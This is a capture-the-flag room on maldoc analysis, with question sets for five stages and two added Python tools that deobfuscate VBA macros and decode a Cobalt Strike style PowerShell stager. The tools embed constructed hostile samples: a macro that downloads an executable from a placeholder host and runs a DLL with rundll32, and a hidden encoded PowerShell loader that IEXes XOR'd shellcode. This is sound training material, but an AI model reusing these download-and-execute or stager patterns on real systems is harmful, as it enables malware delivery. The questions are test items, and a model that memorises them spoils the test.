
Squid Game (오징어 게임)

Difficulty: hard

Estimated time: 130 min


Task 1: Scenario

Invitation Received

You have an invitation to play Squid Game.


In this game you play the defensive role and must eliminate five attackers. Be warned before the game starts: this is not going to be easy. Fewer hints are provided in this room, to challenge you. You may not believe it, but sometimes the best way to learn is to do your own research and come up with your own approach to the challenges. The virtual machine has all the tools you need to complete the challenge.

We look forward to your writeups! 

What is the prize for the winner? 


You will get credit for being awesome and also take away a bunch of knowledge.

And, on the final note, let the game begin!


Deploy the machine attached to this task; it will be visible in the split-screen view once it is ready.

If you don't see a virtual machine load then click the Show Split View button.


Answer the questions below
Accept the invitation? (Yes/No)


Attacker 1 gives you a warm-up before the hardest challenges yet to come... Try to push Attacker 1 outside the lines.

Good Luck! 

Answer the questions below
What is the malicious C2 domain you found in the maldoc where an executable download was attempted?

What executable file is the maldoc trying to drop?

In what folder is it dropping the malicious executable? (hint: %Folder%)

Provide the name of the COM object the maldoc is trying to access.

Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)

Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)

Using static analysis, provide the type listed for the keyword “AutoOpen”.

Provide the subject for this maldoc. (make sure to remove the extra whitespace)

Provide the time when this document was last saved. (Format: YEAR-MONTH-DAY XX:XX:XX)

Provide the stream number that contains a macro.

Provide the name of the stream that contains a macro.


Uh oh! Looks like you have got the next opponent - Attacker 2! 

Ready for the challenge?

Answer the questions below
Provide the streams (numbers) that contain macros.

Provide the size (bytes) of the compiled code for the second stream that contains a macro.

Provide the largest number of bytes found while analyzing the streams.

Find the command located in the ‘fun’ field (make sure to reverse the string).

Provide the first domain found in the maldoc.

Provide the second domain found in the maldoc.

Provide the name of the first malicious DLL it retrieves from the C2 server.

How many DLLs does the maldoc retrieve from the domains?

Provide the path where the malicious DLLs are dropped.

What program is it using to run DLLs?

For how many seconds does the function in the maldoc sleep so that the malicious DLLs fully execute?

Which stream holds the main malicious script that retrieves the DLLs from the C2 domains? (Provide the name of the stream.)
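The Attacker 1 and Attacker 2 questions above come down to reading macro text that hides its strings with Chr() concatenation, split literals and StrReverse (the reversed 'fun' field), then picking out the hosts, binaries, folders and COM objects. The script below is an added example written for this page, not code from the room or from the maldocs it ships: the sample macro, its hosts (203.0.113.5, cdn.example.net), the %AppData% and %Temp% paths and the phone number are constructed for illustration. It undoes those three string tricks and then pulls the IOC types the questions ask for out of the cleaned text; the same approach carries over to the later stages.

```python
"""Added example (not code from the room or its maldocs): undo the string tricks
common in VBA maldocs, then pull IOCs out of the cleaned macro text.
Standard library only."""
import re

# Constructed sample macro written for this example. The StrReverse arguments are
# "%AppData%\update.exe" and "%Temp%\n.dll" written backwards; the Chr() codes
# spell "WScript". Hosts, paths and the phone number are placeholders.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim sh As Object, fun As String, dst As String
    Set sh = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ".Shell")
    fun = "http://" & "203.0.113.5" & "/update.php"
    dst = StrReverse("exe.etadpu\%ataDppA%")
    URLDownloadToFile 0, fun, dst, 0, 0
    sh.Run "rundll32 " & StrReverse("lld.n\%pmeT%") & ",Start", 0
    sh.Run "cmd /c start " & "http://cdn.example.net/n.dll", 0
    ' Call 555-010-1234 for support
End Sub
'''

CHR_RE = re.compile(r'Chr\((\d+)\)')
CONCAT_RE = re.compile(r'"\s*&\s*"')            # closing quote, &, opening quote
STRREV_RE = re.compile(r'StrReverse\("([^"]*)"\)')


def _join_literals(text):
    """Collapse "ab" & "cd" into "abcd"; loop because one pass can expose new pairs."""
    prev = None
    while prev != text:
        prev, text = text, CONCAT_RE.sub('', text)
    return text


def deobfuscate_vba(text):
    """Resolve Chr(), literal concatenation and StrReverse() to plain string literals."""
    # Chr(34) is a double quote and would need VBA's doubled-quote escaping; leave it alone
    text = CHR_RE.sub(lambda m: m.group(0) if int(m.group(1)) == 34
                      else '"%s"' % chr(int(m.group(1))), text)
    text = _join_literals(text)                     # so StrReverse sees a single literal
    text = STRREV_RE.sub(lambda m: '"%s"' % m.group(1)[::-1], text)
    return _join_literals(text)                     # joins exposed by the reversal


IOC_PATTERNS = {
    "urls": re.compile(r'https?://[^\s"\'<>]+', re.I),
    "env_paths": re.compile(r'%[A-Za-z]+%\\[^\s",]+'),         # %AppData%\x.exe style
    "com_objects": re.compile(r'CreateObject\("([^"]+)"\)'),
    "binaries": re.compile(r'\b[\w.-]+\.(?:exe|dll)\b', re.I),
    "phone_numbers": re.compile(r'\b\d{3}-\d{3}-\d{4}\b'),
}


def extract_iocs(text):
    """Return sorted, de-duplicated IOC candidates per category, plus the URL hosts."""
    found = {name: sorted(set(p.findall(text))) for name, p in IOC_PATTERNS.items()}
    found["hosts"] = sorted({re.sub(r'^https?://', '', u, flags=re.I).split('/')[0]
                             for u in found["urls"]})
    return found


def analyze(macro_text):
    """Deobfuscate, then extract; returns (cleaned_text, iocs)."""
    cleaned = deobfuscate_vba(macro_text)
    return cleaned, extract_iocs(cleaned)


if __name__ == "__main__":
    cleaned, iocs = analyze(SAMPLE_MACRO)
    print(cleaned)
    for name, values in iocs.items():
        print(f"{name}: {values}")
```

Run it against the VBA source that olevba prints, or that oledump's -v option decompresses from the macro stream. The regexes are deliberately broad, so confirm each hit against the code path that uses it (for example, which string ends up in the .Run call) before reporting it as an answer.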


Looks like Attacker 3 is trying to dominate a home base. Find his weaknesses and eliminate him. 

Answer the questions below
Provide the executable name being downloaded.

What program is used to run the executable?

Provide the malicious URI included in the maldoc that was used to download the binary (without http/https).

In what folder does the binary get dropped?

Which stream executes the binary that was downloaded?


You are very close to the finish line, but Attacker 4 is still standing in your way. Don't let him win!

Answer the questions below
Provide the first decoded string found in this maldoc.

Provide the name of the binary being dropped.

Provide the folder where the binary is being dropped to.

Provide the name of the second binary.

Provide the full URI from which the second binary was downloaded (exclude http/https).


Congratulations, my friend! You have made it to the final stage. Remember to use your brain, not your fists, to defeat Attacker 5.


You can do it! 

Answer the questions below
What is the caption you found in the maldoc?

What is the XOR decimal value found in the decoded-base64 script?

Provide the C2 IP address of the Cobalt Strike server. 

Provide the full user-agent found.

Provide the path value for the Cobalt Strike shellcode.

Provide the port number of the Cobalt Strike C2 Server.

Provide the first two APIs found.
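The Attacker 5 questions follow the usual layering of a Cobalt Strike PowerShell stager: an -EncodedCommand (base64 of UTF-16LE text) that gunzips and IEXes a second base64 blob, which in turn base64-decodes the shellcode and XORs every byte with a one-byte decimal key (the -bxor operand); the C2 host, port, user-agent and URI path are then readable in the decoded bytes. The script below is an added example for this page, not code from the room and not a real Cobalt Strike artifact: the command line it decodes is built inline from constructed values (203.0.113.7, port 443, /dpixel, the user-agent string, key 35), and the API-name allowlist is a small list chosen for the example.

```python
"""Added example (not code from the room, nor a real Cobalt Strike artifact): peel the
layers of a Cobalt Strike style PowerShell stager and pull the C2 details out of the
decoded shellcode. The input is built inline from constructed values."""
import base64
import gzip
import re
import struct

# Constructed fixture values; none of them come from a real sample
SAMPLE_C2 = b"203.0.113.7"
SAMPLE_PORT = 443
SAMPLE_PATH = b"/dpixel"
SAMPLE_UA = b"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"
XOR_KEY = 35
# Small allowlist chosen for the example; extend it for real work
KNOWN_APIS = ("LoadLibraryA", "InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
              "HttpSendRequestA", "InternetReadFile", "VirtualAlloc", "CreateThread")


def build_sample_cmdline():
    """Build the three-layer command line (encoded command -> gzip loader -> XOR'd shellcode)."""
    shellcode = (b"wininet\x00InternetOpenA\x00InternetConnectA\x00"
                 + b"\x68" + struct.pack("<I", SAMPLE_PORT)       # push imm32 <port>
                 + SAMPLE_C2 + b"\x00" + SAMPLE_UA + b"\x00" + SAMPLE_PATH + b"\x00")
    encoded = bytes(b ^ XOR_KEY for b in shellcode)
    inner = ("[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
             "for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor %d }\n"
             % (base64.b64encode(encoded).decode(), XOR_KEY))
    loader = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
              'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
              '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'
              % base64.b64encode(gzip.compress(inner.encode())).decode())
    return "powershell -nop -w hidden -encodedcommand " + base64.b64encode(loader.encode("utf-16le")).decode()


ENC_CMD_RE = re.compile(r"-e(?:ncodedcommand|nc)?\s+([A-Za-z0-9+/=]+)", re.I)
B64_ARG_RE = re.compile(r"""FromBase64String\(['"]([A-Za-z0-9+/=]+)['"]\)""")
XOR_RE = re.compile(r"-bxor\s+(\d+)")
ASCII_RUN_RE = re.compile(rb"[\x20-\x7e]{4,}")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def push_imm32_ports(code):
    """Candidate ports: operands of 'push imm32' (0x68 + little-endian dword) that fit 16 bits.
    Stagers push the port right before calling InternetConnectA."""
    ports = []
    for i in range(len(code) - 4):
        if code[i] == 0x68:
            value = struct.unpack_from("<I", code, i + 1)[0]
            if 0 < value <= 0xFFFF:
                ports.append(value)
    return ports


def decode_stager(cmdline):
    """Walk the layers and return the IOCs the decoded shellcode exposes."""
    # Layer 1: -EncodedCommand carries base64 of UTF-16LE script text
    script = base64.b64decode(ENC_CMD_RE.search(cmdline).group(1)).decode("utf-16le")
    # Layer 2: the loader gunzips a second base64 blob and IEXes it
    if "GzipStream" in script:
        script = gzip.decompress(base64.b64decode(B64_ARG_RE.search(script).group(1))).decode()
    # Layer 3: base64 shellcode, every byte XOR'd with the decimal operand of -bxor
    key = int(XOR_RE.search(script).group(1))
    shellcode = bytes(b ^ key for b in base64.b64decode(B64_ARG_RE.search(script).group(1)))
    strings = [s.decode() for s in ASCII_RUN_RE.findall(shellcode)]
    return {
        "xor_key": key,
        "c2_ips": [s for s in strings if IPV4_RE.match(s)],
        "ports": push_imm32_ports(shellcode),
        "user_agent": next((s.split(":", 1)[1].strip() for s in strings
                            if s.startswith("User-Agent:")), None),
        "uri_paths": [s for s in strings if s.startswith("/") and " " not in s],
        "apis": [s for s in strings if s in KNOWN_APIS],
    }


if __name__ == "__main__":
    for name, value in decode_stager(build_sample_cmdline()).items():
        print(f"{name}: {value}")
```

Feed decode_stager() the command line recovered from the macro. The port heuristic reads push imm32 operands and can pick up other small immediates in real shellcode, so confirm the value against the one pushed just before the InternetConnectA call, and keep the decoded bytes for scdbg or a disassembler when the strings alone are not enough.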
